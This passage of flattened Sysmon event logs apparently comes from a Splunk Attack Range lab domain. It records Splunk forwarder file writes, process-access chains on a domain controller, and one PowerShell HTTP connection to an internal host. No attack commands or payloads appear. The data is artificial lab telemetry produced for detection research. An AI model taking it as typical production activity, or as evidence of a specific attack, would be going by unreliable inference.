Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E6B45A1969C706E8524DD2384BE0CE0,SHA256=05B407F71766C6A788B7D770994216C8A678944825192C37EFD1595619AADCA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150287Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:54.243{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E0343C549F166B15902716CE15F0A96,SHA256=B3ED34DAEC8EA83AC52900496ED0221EFE9E4C884F00FE02BD1DED7D7013D7A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150288Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:55.258{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1E4BD116C77AB84A71B02EB096FD0F4,SHA256=8E61E8D5E759DB352F619FEC89E16B66B49EDFD3C1148A9E641DA835AC9483BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104700Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:56.656{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5797E3571F6C1F0735EADE7BCA518279,SHA256=294173258CD15F8F7181DABC086132BBC39BA94C5124343C360CFE196A15BA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150291Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:56.857{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B0DBCBCAD00FE803BF58153B4A60511,SHA256=1B595490112A31D306F2FC327CFEC939F2584981BBA3BC8DB7EC0C51B8BA58A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150290Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:56.393{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\permissions.sqlite-journalMD5=41A9BB807F6924CA601F56EBF8704EA5,SHA256=7717D07852715A0F0566B019CCC5733B3F326EB1C2039F78A63C0C1D8B381EAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150289Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:56.273{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F297EBF430E7CF2398C00BC2A8348C0F,SHA256=0FADDFB3471A4A530BCA2D37F61C776571101A47D665CA9BD3AE8623291450A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150293Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:55.993{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58379-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150292Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:57.292{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB7C93B6ECCD45F7AD2BE738580C8D2D,SHA256=43DC5D78EFCA722B769E8EAF170D1188177911675D14656371DF3B8D443B39F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104701Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:58.594{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B803927A669B0DCE92216D55F3F93C,SHA256=D38B8CB9611CA79E628FD69E19B95EBFFC9F0C15456D9D1A039F894310B349DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150295Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:56.577{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58378-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal80http 23542300x8000000000000000150294Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:58.299{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=906FD8FB444F95D532039FAAB97AB9DF,SHA256=72593B694C81295364DD8A585A64D28BAED01B072F7AF6324D65820B9D9F64B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104719Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.994{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DB-60CA-2313-00000000CF01}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104718Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.993{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104717Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.993{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104716Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.992{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104715Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.992{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104714Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.992{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-70DB-60CA-2313-00000000CF01}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104713Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.992{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DB-60CA-2313-00000000CF01}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104712Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.990{54715871-70DB-60CA-2313-00000000CF01}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104711Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.990{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1974A9F8EF6C39CC29945A1B8DD1B5C,SHA256=9E2DD23BF500487EA7AAE8B02679FDA5348430EDB76E56F8CFEF5EDFC100FC7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104710Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.314{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DB-60CA-2213-00000000CF01}1180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104709Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104708Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104707Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104706Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.311{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104705Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.311{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-70DB-60CA-2213-00000000CF01}1180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104704Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.311{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DB-60CA-2213-00000000CF01}1180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104703Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:59.310{54715871-70DB-60CA-2213-00000000CF01}1180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104702Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:56.772{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55400-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150296Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:59.330{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61DC119E04D09CCA1FF579BE314D3CD,SHA256=76D7209C79569135BA40AB248710B615D96E4D259ABA7E330E82A781958B02EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104729Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.824{54715871-70DC-60CA-2413-00000000CF01}45485872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104728Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.674{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DC-60CA-2413-00000000CF01}4548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104727Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.672{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104726Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.672{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104725Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 